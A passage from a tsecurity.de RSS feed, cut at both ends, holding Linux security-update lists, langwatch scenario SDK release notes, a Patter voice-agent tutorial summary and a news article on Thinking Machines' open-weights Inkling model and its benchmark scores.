deployment gaps. But without public pricing, technical interoperability details, compliance information or service-level commitments, customers still lack much of the information needed to assess total cost and operational risk.</p><p>For now, Presence appears aimed at enterprises willing to adopt a high-touch, OpenAI-led deployment process. Whether it develops into a broadly accessible platform—or remains a closely managed product for selected customers—will depend in part on the answers OpenAI has not yet provided.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (capstone, fence-agents, gimp, glib2, hplip, httpd, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, libtiff, maven:3.8, pacemaker, python3.14, and webkit2gtk3), Debian (samba), Fedora (c-ares, d...]]></description>
<link>https://tsecurity.de/de/3683836/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683836/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 21 Jul 2026 15:27:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (capstone, fence-agents, gimp, glib2, hplip, httpd, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, libtiff, maven:3.8, pacemaker, python3.14, and webkit2gtk3), <b>Debian</b> (samba), <b>Fedora</b> (c-ares, dnsx, freerdp, gpsd, libreswan, libseccomp, libtiff, mingw-python-idna, mingw-python-pip, openssh, python-pillow, wget1, and wireshark), <b>Mageia</b> (golang, graphicsmagick, haveged, libssh2, nginx, nilfs-utils, perl-CGI-Session, perl-Imager, perl-JavaScript-Minifier-XS, php, php8.4, php8.5, python-nltk, sqlite3, and xmlstarlet), <b>Oracle</b> (.NET 10.0, .NET 9.0, container-tools:ol8, firefox, giflib, glibc, go-fdo-client, go-fdo-server, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, hplip, httpd, image-builder, kernel, libtiff, mod_http2, pacemaker, perl-DBI:1.641, perl-HTTP-Daemon, php:8.2, python-markdown, ruby4.0, systemd, and thunderbird), <b>Red Hat</b> (buildah, container-tools:rhel8, dracut, golang-github-openprinting-ipp-usb, libtiff, osbuild-composer, python-urllib3, python3.12-urllib3, python3.14-urllib3, and runc), <b>SUSE</b> (389-ds, chromedriver, gstreamer-plugins-bad, libreoffice, libsuricata8_0_6, podman, python311, and sssd), and <b>Ubuntu</b> (apache2, freerdp3, freetype, libde265, libxfont, linux, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-realtime, linux-realtime-6.8, linux, linux-gcp, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-realtime, linux-xilinx-zynqmp, linux, linux-gcp, linux-gke, linux-realtime, linux-gcp-6.17, linux-realtime-6.17, linux-gcp-fips, linux-hwe-7.0, linux-nvidia-tegra-5.15, linux-oem-7.0, nginx, php8.1, php8.3, php8.5, rlottie, sqlite3, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[python: v0.7.32]]></title>
<description><![CDATA[0.7.32 (2026-07-20)
Features

#660: expose context param on scenario.judge() public API (#667) (900f3d8)
#666: per-role voice modality negotiation — declaration-first, two-phase validation, OTEL stamps (#670) (007a69f)
events: support LANGWATCH_PROJECT_ID via X-Project-Id header (#619) (7aec1c7)
...]]></description>
<link>https://tsecurity.de/de/3681369/it-security-tools/python-v0732/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681369/it-security-tools/python-v0732/</guid>
<pubDate>Mon, 20 Jul 2026 16:19:58 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/langwatch/scenario/compare/python/v0.7.31...python/v0.7.32">0.7.32</a> (2026-07-20)</h2>
<h3>Features</h3>
<ul>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639907852" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/660" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/660/hovercard" href="https://github.com/langwatch/scenario/issues/660">#660</a>:</strong> expose context param on scenario.judge() public API (<a href="https://github.com/langwatch/scenario/issues/667" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/667/hovercard">#667</a>) (<a href="https://github.com/langwatch/scenario/commit/900f3d866d5787a015780965e9de4f518b753ad7">900f3d8</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4650318823" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/666" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/666/hovercard" href="https://github.com/langwatch/scenario/issues/666">#666</a>:</strong> per-role voice modality negotiation — declaration-first, two-phase validation, OTEL stamps (<a href="https://github.com/langwatch/scenario/issues/670" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/670/hovercard">#670</a>) (<a href="https://github.com/langwatch/scenario/commit/007a69faff6f33b9b5a6e9d4f811e9e2d8c81fdd">007a69f</a>)</li>
<li><strong>events:</strong> support LANGWATCH_PROJECT_ID via X-Project-Id header (<a href="https://github.com/langwatch/scenario/issues/619" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/619/hovercard">#619</a>) (<a href="https://github.com/langwatch/scenario/commit/7aec1c7c88a08ee4d732609fa480489e100f22e5">7aec1c7</a>)</li>
<li><strong>tracing:</strong> stamp scenario SDK name+version as trace attributes (<a href="https://github.com/langwatch/scenario/issues/744" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/744/hovercard">#744</a>) (<a href="https://github.com/langwatch/scenario/issues/745" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/745/hovercard">#745</a>) (<a href="https://github.com/langwatch/scenario/commit/43dd4fae3b439561b9ff196a9c0297968c1ae607">43dd4fa</a>)</li>
<li><strong>voice:</strong> continuous ElevenLabs mic pump + is_connected guard (<a href="https://github.com/langwatch/scenario/issues/740" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/740/hovercard">#740</a> slice A) (<a href="https://github.com/langwatch/scenario/issues/741" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/741/hovercard">#741</a>) (<a href="https://github.com/langwatch/scenario/commit/b6e7f93c43fee650c0fe37f27153a4805f3e7eb8">b6e7f93</a>)</li>
<li><strong>voice:</strong> harvest voice result fields on exit paths + concrete typing (<a href="https://github.com/langwatch/scenario/issues/740" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/740/hovercard">#740</a> slice E) (<a href="https://github.com/langwatch/scenario/issues/742" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/742/hovercard">#742</a>) (<a href="https://github.com/langwatch/scenario/commit/439b7be5bb02c9fa9ebf56ef71f76537e043ffde">439b7be</a>)</li>
<li><strong>voice:</strong> instrument base + ElevenLabs adapter with LangWatch spans (<a href="https://github.com/langwatch/scenario/issues/777" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/777/hovercard">#777</a>) (<a href="https://github.com/langwatch/scenario/commit/2b32872aa57b13f80e6b063425efac38a0c7604b">2b32872</a>)</li>
<li><strong>voice:</strong> instrument Gemini Live adapter with LangWatch spans (<a href="https://github.com/langwatch/scenario/issues/780" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/780/hovercard">#780</a>) (<a href="https://github.com/langwatch/scenario/commit/8ba8687cf38849074fe97a83a0ea4733cfdec09a">8ba8687</a>)</li>
<li><strong>voice:</strong> instrument OpenAI Realtime adapter with LangWatch spans (<a href="https://github.com/langwatch/scenario/issues/782" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/782/hovercard">#782</a>) (<a href="https://github.com/langwatch/scenario/commit/315296936f1d1465f97305431cdedba7730f9136">3152969</a>)</li>
<li><strong>voice:</strong> instrument Pipecat adapter + background-loop spans (<a href="https://github.com/langwatch/scenario/issues/774" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/774/hovercard">#774</a>) (<a href="https://github.com/langwatch/scenario/commit/67f71b1d30610e2da96396dea1e4c7f1a1355831">67f71b1</a>)</li>
<li><strong>voice:</strong> instrument Pipecat adapter + background-loop spans (<a href="https://github.com/langwatch/scenario/issues/781" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/781/hovercard">#781</a>) (<a href="https://github.com/langwatch/scenario/commit/67f71b1d30610e2da96396dea1e4c7f1a1355831">67f71b1</a>)</li>
<li><strong>voice:</strong> instrument Twilio adapter with LangWatch spans (<a href="https://github.com/langwatch/scenario/issues/788" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/788/hovercard">#788</a>) (<a href="https://github.com/langwatch/scenario/commit/8747eed1a8e36db0dfba3ebd08359822fa6d1e52">8747eed</a>)</li>
<li><strong>voice:</strong> realtime_langwatch_session context manager for live OpenAI Realtime apps (<a href="https://github.com/langwatch/scenario/issues/673" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/673/hovercard">#673</a>) (<a href="https://github.com/langwatch/scenario/issues/676" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/676/hovercard">#676</a>) (<a href="https://github.com/langwatch/scenario/commit/e89d00c344eeac18a8673eb974d905afa14014b4">e89d00c</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3654909090" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/161" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/161/hovercard" href="https://github.com/langwatch/scenario/issues/161">#161</a>:</strong> re-parse criteria when LLM returns stringified JSON dict (<a href="https://github.com/langwatch/scenario/issues/552" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/552/hovercard">#552</a>) (<a href="https://github.com/langwatch/scenario/commit/b8198493aa638f0c31821050d7d4502b08e5f88e">b819849</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485409944" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/488" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/488/hovercard" href="https://github.com/langwatch/scenario/issues/488">#488</a>:</strong> log voice adapter and ffmpeg disconnect failures at WARNING (<a href="https://github.com/langwatch/scenario/issues/556" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/556/hovercard">#556</a>) (<a href="https://github.com/langwatch/scenario/commit/86bf4662c0a5f16ec23c25a11ea78368d39bff26">86bf466</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634746372" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/655" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/655/hovercard" href="https://github.com/langwatch/scenario/issues/655">#655</a>:</strong> replace brittle judge criteria with generic behavioral criteria in audio examples (<a href="https://github.com/langwatch/scenario/issues/679" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/679/hovercard">#679</a>) (<a href="https://github.com/langwatch/scenario/commit/732d426ae4865c8027fb03182cf8211461c11514">732d426</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4647094960" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/664" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/664/hovercard" href="https://github.com/langwatch/scenario/issues/664">#664</a>:</strong> transcribe agent turns at runtime so the voice user simulator can read them (<a href="https://github.com/langwatch/scenario/issues/665" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/665/hovercard">#665</a>) (<a href="https://github.com/langwatch/scenario/commit/4b99682bee8ca6820537a100551ec83e97bcd89f">4b99682</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4710280252" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/695" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/695/hovercard" href="https://github.com/langwatch/scenario/issues/695">#695</a>:</strong> twilio terminal sentinel on silent/tool-only stop (dead-recv-loop hang) (<a href="https://github.com/langwatch/scenario/issues/697" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/697/hovercard">#697</a>) (<a href="https://github.com/langwatch/scenario/commit/e675224226974eeb69a0ddffee48d47cca35b77c">e675224</a>)</li>
<li><strong>python:</strong> derive scenario.<strong>version</strong> from package metadata (<a href="https://github.com/langwatch/scenario/issues/800" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/800/hovercard">#800</a>) (<a href="https://github.com/langwatch/scenario/commit/0d505a7cfcc9467821ed61119f291944b626cc7f">0d505a7</a>)</li>
<li><strong>security:</strong> bump pyjwt to 2.13.0 (<a href="https://github.com/langwatch/scenario/issues/677" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/677/hovercard">#677</a>) (<a href="https://github.com/langwatch/scenario/commit/00807b770ad997a12ca1c10418e409e6f0cdf44b">00807b7</a>)</li>
<li><strong>security:</strong> bump python/uv.lock security floors (cryptography, python-multipart, starlette, python-liquid, pydantic-settings) (<a href="https://github.com/langwatch/scenario/issues/685" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/685/hovercard">#685</a>) (<a href="https://github.com/langwatch/scenario/commit/ee9a5d5f2d1c55b23e122dbdb138d82d38ab861c">ee9a5d5</a>)</li>
<li><strong>security:</strong> raise esbuild, js-yaml, and dompurify override floors across JS workspaces (<a href="https://github.com/langwatch/scenario/issues/671" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/671/hovercard">#671</a>) (<a href="https://github.com/langwatch/scenario/commit/c76bab247cd69395bcd55b85046dc4f17c783618">c76bab2</a>)</li>
<li><strong>security:</strong> raise vite 8.x floor to &gt;=8.0.16 across scenario workspaces (<a href="https://github.com/langwatch/scenario/issues/709" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/709/hovercard">#709</a>) (<a href="https://github.com/langwatch/scenario/commit/42d877ed4b187b3a7478f38f6efdce932cb696d9">42d877e</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485412046" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/491" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/491/hovercard" href="https://github.com/langwatch/scenario/issues/491">#491</a>:</strong> diagnose + resolve multi-turn <a href="https://github.com/e2e">@e2e</a> suite-wedge + tighten VAD tests (<a href="https://github.com/langwatch/scenario/issues/694" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/694/hovercard">#694</a>) (<a href="https://github.com/langwatch/scenario/commit/2dfc381df3c27f073706e5aed56d6852a9d8ebf0">2dfc381</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487734199" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/498" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/498/hovercard" href="https://github.com/langwatch/scenario/issues/498">#498</a>:</strong> surface recv-loop termination as attributable PipecatRecvError (<a href="https://github.com/langwatch/scenario/issues/692" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/692/hovercard">#692</a>) (<a href="https://github.com/langwatch/scenario/commit/c1f552cac4845654a57b27c5f705f61c3a3951cc">c1f552c</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4632750761" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/648" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/648/hovercard" href="https://github.com/langwatch/scenario/issues/648">#648</a>:</strong> terminal drain on non-audio completion (EL + WebSocket) (<a href="https://github.com/langwatch/scenario/issues/693" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/693/hovercard">#693</a>) (<a href="https://github.com/langwatch/scenario/commit/c42320e130ae3d0ea67a743ffea8195cc5f76825">c42320e</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4640224309" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/662" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/662/hovercard" href="https://github.com/langwatch/scenario/issues/662">#662</a>:</strong> guard <a href="https://github.com/langwatch/scenario/issues/662" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/662/hovercard">#662</a>'s response.create call sites against the active-response race (JS + PY) (<a href="https://github.com/langwatch/scenario/issues/669" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/669/hovercard">#669</a>) (<a href="https://github.com/langwatch/scenario/commit/0968374e2232af05cffd32b87c00e341511b2723">0968374</a>)</li>
<li><strong>voice/ts:</strong> explicit EL ConvAI turn-commit so scripted next-turn receive re-engages (<a href="https://github.com/langwatch/scenario/issues/596" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/596/hovercard">#596</a>) (<a href="https://github.com/langwatch/scenario/commit/795ae8eb7e672e180fea6a657d472e566431883b">795ae8e</a>)</li>
<li><strong>voice:</strong> guard response.create on active response in recv_audio (<a href="https://github.com/langwatch/scenario/issues/659" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/659/hovercard">#659</a>) (<a href="https://github.com/langwatch/scenario/commit/5e844ea73f39473f39fe70516c53762437263be1">5e844ea</a>)</li>
<li><strong>voice:</strong> hosted ElevenLabs single-exchange ceiling — docs + enriched timeout error (<a href="https://github.com/langwatch/scenario/issues/643" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/643/hovercard">#643</a>) (<a href="https://github.com/langwatch/scenario/commit/aae16beec4d5b74ee331c29ad960c43632434da0">aae16be</a>)</li>
<li><strong>voice:</strong> skip Twilio e2e fixtures on absent env, not fail (<a href="https://github.com/langwatch/scenario/issues/798" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/798/hovercard">#798</a>) (<a href="https://github.com/langwatch/scenario/commit/4c883d00a4c1155feedeb8c8638b4ece30931613">4c883d0</a>)</li>
<li><strong>voice:</strong> terminate wait=False test drain on end-of-turn, re-enable in CI (<a href="https://github.com/langwatch/scenario/issues/691" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/691/hovercard">#691</a>) (<a href="https://github.com/langwatch/scenario/commit/022056dc3621412256904bc8ddca930baafb2033">022056d</a>)</li>
</ul>
<h3>Documentation</h3>
<ul>
<li><strong>voice:</strong> drop references to a docs/proposals tree that never landed (<a href="https://github.com/langwatch/scenario/issues/613" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/613/hovercard">#613</a>) (<a href="https://github.com/langwatch/scenario/issues/823" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/823/hovercard">#823</a>) (<a href="https://github.com/langwatch/scenario/commit/0ef4314fef19d76013a3dbc56f7667b73a7a9dc9">0ef4314</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[javascript: v0.5.4]]></title>
<description><![CDATA[0.5.4 (2026-07-20)
Features

voice: instrument base + ElevenLabs adapter with LangWatch spans (#777) (2b32872)
voice: instrument Gemini Live adapter with LangWatch spans (#780) (8ba8687)
voice: instrument OpenAI Realtime adapter with LangWatch spans (#782) (3152969)
voice: instrument Pipecat adap...]]></description>
<link>https://tsecurity.de/de/3681368/it-security-tools/javascript-v054/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681368/it-security-tools/javascript-v054/</guid>
<pubDate>Mon, 20 Jul 2026 16:19:57 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/langwatch/scenario/compare/javascript/v0.5.3...javascript/v0.5.4">0.5.4</a> (2026-07-20)</h2>
<h3>Features</h3>
<ul>
<li><strong>voice:</strong> instrument base + ElevenLabs adapter with LangWatch spans (<a href="https://github.com/langwatch/scenario/issues/777" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/777/hovercard">#777</a>) (<a href="https://github.com/langwatch/scenario/commit/2b32872aa57b13f80e6b063425efac38a0c7604b">2b32872</a>)</li>
<li><strong>voice:</strong> instrument Gemini Live adapter with LangWatch spans (<a href="https://github.com/langwatch/scenario/issues/780" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/780/hovercard">#780</a>) (<a href="https://github.com/langwatch/scenario/commit/8ba8687cf38849074fe97a83a0ea4733cfdec09a">8ba8687</a>)</li>
<li><strong>voice:</strong> instrument OpenAI Realtime adapter with LangWatch spans (<a href="https://github.com/langwatch/scenario/issues/782" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/782/hovercard">#782</a>) (<a href="https://github.com/langwatch/scenario/commit/315296936f1d1465f97305431cdedba7730f9136">3152969</a>)</li>
<li><strong>voice:</strong> instrument Pipecat adapter + background-loop spans (<a href="https://github.com/langwatch/scenario/issues/774" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/774/hovercard">#774</a>) (<a href="https://github.com/langwatch/scenario/commit/67f71b1d30610e2da96396dea1e4c7f1a1355831">67f71b1</a>)</li>
<li><strong>voice:</strong> instrument Pipecat adapter + background-loop spans (<a href="https://github.com/langwatch/scenario/issues/781" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/781/hovercard">#781</a>) (<a href="https://github.com/langwatch/scenario/commit/67f71b1d30610e2da96396dea1e4c7f1a1355831">67f71b1</a>)</li>
<li><strong>voice:</strong> instrument Twilio adapter with LangWatch spans (<a href="https://github.com/langwatch/scenario/issues/788" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/788/hovercard">#788</a>) (<a href="https://github.com/langwatch/scenario/commit/8747eed1a8e36db0dfba3ebd08359822fa6d1e52">8747eed</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong>security:</strong> bump <a href="https://github.com/opentelemetry">@opentelemetry</a> sdk-node/exporter-prometheus to 0.217.0 (<a href="https://github.com/langwatch/scenario/commit/87d5509f8421f7b2370e9b64ab71daf4612e0a1a">87d5509</a>)</li>
<li><strong>security:</strong> bump <a href="https://github.com/opentelemetry">@opentelemetry</a> sdk-node/exporter-prometheus to 0.217.0 (with ReadableSpan migration) (<a href="https://github.com/langwatch/scenario/issues/702" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/702/hovercard">#702</a>) (<a href="https://github.com/langwatch/scenario/commit/87d5509f8421f7b2370e9b64ab71daf4612e0a1a">87d5509</a>)</li>
<li><strong>security:</strong> raise esbuild, js-yaml, and dompurify override floors across JS workspaces (<a href="https://github.com/langwatch/scenario/issues/671" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/671/hovercard">#671</a>) (<a href="https://github.com/langwatch/scenario/commit/c76bab247cd69395bcd55b85046dc4f17c783618">c76bab2</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Patter SDK Guide to Building a Restaurant Booking Phone Agent with Dynamic Variables, Guardrails, Latency Dashboards, and Eval Checks]]></title>
<description><![CDATA[We explore the Patter SDK by building a voice-agent workflow for a restaurant booking use case. We define dynamic caller variables, register callable tools for availability, bookings, hours, and human transfer, and layer output guardrails over every reply. We simulate speech-to-text and text-to-s...]]></description>
<link>https://tsecurity.de/de/3672718/ai-nachrichten/patter-sdk-guide-to-building-a-restaurant-booking-phone-agent-with-dynamic-variables-guardrails-latency-dashboards-and-eval-checks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672718/ai-nachrichten/patter-sdk-guide-to-building-a-restaurant-booking-phone-agent-with-dynamic-variables-guardrails-latency-dashboards-and-eval-checks/</guid>
<pubDate>Thu, 16 Jul 2026 09:49:05 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We explore the Patter SDK by building a voice-agent workflow for a restaurant booking use case. We define dynamic caller variables, register callable tools for availability, bookings, hours, and human transfer, and layer output guardrails over every reply. We simulate speech-to-text and text-to-speech behavior, run scripted call flows, and track modeled latency and cost in a dashboard. We validate the agent with a deterministic eval harness, then map the same logic to a real deployment using Twilio and OpenAI Realtime.</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/16/patter-sdk-guide-to-building-a-restaurant-booking-phone-agent-with-dynamic-variables-guardrails-latency-dashboards-and-eval-checks/">Patter SDK Guide to Building a Restaurant Booking Phone Agent with Dynamic Variables, Guardrails, Latency Dashboards, and Eval Checks</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thinking Machines open sources first multimodal language model, Inkling, focused on low cost and 'resistance to censorship']]></title>
<description><![CDATA[Enterprises looking to move more of their agentic AI workloads to open weights models they can customize, control and run on-premises or in virtual private clouds have a strong new contender to consider.Today, Thinking Machines—the highly capitalized American AI startup founded by former OpenAI C...]]></description>
<link>https://tsecurity.de/de/3672034/it-nachrichten/thinking-machines-open-sources-first-multimodal-language-model-inkling-focused-on-low-cost-and-resistance-to-censorship/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672034/it-nachrichten/thinking-machines-open-sources-first-multimodal-language-model-inkling-focused-on-low-cost-and-resistance-to-censorship/</guid>
<pubDate>Thu, 16 Jul 2026 00:46:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprises looking to move more of their agentic AI workloads to open weights models they can customize, control and run on-premises or in virtual private clouds have a strong new contender to consider.</p><p>Today, Thinking Machines—the highly capitalized American AI startup founded by former OpenAI CTO Mira Murati—<a href="https://thinkingmachines.ai/news/introducing-inkling/">released Inkling</a>, its first major language model under an<a href="https://choosealicense.com/licenses/apache-2.0/"> enterprise-friendly Apache 2.0 open source license</a>, and it boasts high, if sub state-of-the-art, performance for open weights models on third-party benchmarks, specifically software engineering (77.6% on SWE-bench Verified, where it beats fellow U.S. open rival Nvidia Nemotron 3's 71.9%) and voice understanding (91.4% on VoiceBench compared to 94.4% for Gemini 3.1 Pro on high reasoning effort).</p><p>Another differentiator: Thinking Machines notes that Inkling was designed "to answer directly on topics that may be subject to censorship," offering enterprises concerned about factual outputs, irrespective of controversy or sensitivity, a more trustworthy option. </p><p>Coming in at 975 billion total parameters, Inkling is a natively multimodal, open-weights Mixture-of-Experts (MoE) system capable of reasoning across text, images, and audio. The weights <a href="https://huggingface.co/thinkingmachines/Inkling">are already available on Hugging Face</a> and the company's own model training application programming interface (API), <a href="https://thinkingmachines.ai/tinker/">Tinker</a>.</p><p>Designed to balance cost against performance through a novel "controllable thinking effort" mechanism, the model represents a significant departure from the black-box scaling strategies of frontier competitors.</p><p>Alongside the flagship model, Thinking Machines also announced a preview of Inkling-Small, a lighter 276-billion-parameter alternative optimized for workloads where low latency and cost are paramount.</p><h2><b>Benchmarks Show a Powerful, High-End, Sub State-of-the-Art Model</b></h2><p>While Inkling is a formidable multimodal engine, it lands in a fiercely competitive 2026 open-weight landscape characterized by highly specialized MoE architectures. Rather than attempting to dominate every leaderboard, Thinking Machines explicitly designed Inkling—with 975 billion total and 41 billion active parameters—as a broad, balanced generalist. </p><p>For example, it comes in near the middle high-end of benchmark performance 1257 on Design Arena’s Agentic Web Dev leaderboard measuring human scores of frontend web design. </p><p>But China’s leading AI labs have produced models with elite reasoning and coding capabilities, posing a stiff challenge to Inkling's generalist approach and ultimately outperforming it on general and coding benchmarks.</p><ul><li><p><b>GLM 5.2:</b> Widely considered the top open-weight reasoning model available in the benchmark set, GLM 5.2 outperforms Inkling on pure coding, agentic, and complex reasoning tasks. It scores 62.1% on SWEBench Pro (Public) compared to Inkling’s 54.3%, and a massive 82.7 on Terminal Bench 2.1 against Inkling’s 63.8. GLM 5.2 also holds the edge in text-only reasoning, scoring 40.1% on HLE (text only) versus Inkling's 30.0%.</p></li><li><p><b>DeepSeek V4 Pro:</b> DeepSeek maintains an edge in several strict coding and factuality domains, beating Inkling on SWEBench Verified (80.6% vs. 77.6%) and SimpleQA Verified (57.0% vs. 43.9%). However, Inkling successfully overtakes DeepSeek V4 Pro in mathematical problem-solving, achieving 97.1% on AIME 2026 compared to DeepSeek's 96.7%.</p></li><li><p><b>Kimi K2.6:</b> This model outpaces Inkling across multiple technical benchmarks, delivering higher scores on GPQA Diamond (91.1% vs. 87.9%), BrowseComp (83.2% vs. 77.1%), and HLE with tools (54.0% vs. 46.0%). Yet Inkling proves more resilient on general chat instruction following, scoring 79.8% on IFBench compared to Kimi K2.6's 76.0%.</p></li></ul><p>Against its primary U.S.-based open-weight competition, Inkling demonstrates strong parity and frequent superiority.</p><ul><li><p><b>Nemotron 3 Ultra:</b> Inkling consistently outperforms this U.S. rival across reasoning and coding. Inkling posts 97.1% on AIME 2026 and 77.6% on SWEBench Verified, beating Nemotron's 94.2% and 70.7%, respectively. Furthermore, Inkling significantly leads in agentic workflows, scoring 74.1% on MCP Atlas against Nemotron's 44.7%.</p></li></ul><p>When compared to closed-source juggernauts like Claude Fable 5, GPT 5.6 Sol, and Gemini 3.1 Pro, Inkling trails in peak reasoning and software engineering autonomy, but remains highly competitive in multimodality.</p><ul><li><p><b>Coding and Reasoning:</b> Closed models maintain a commanding lead. Claude Fable 5 (max) hits 95.0% on SWEBench Verified and 53.3% on HLE (text only), far outpacing Inkling's 77.6% and 30.0%. GPT 5.6 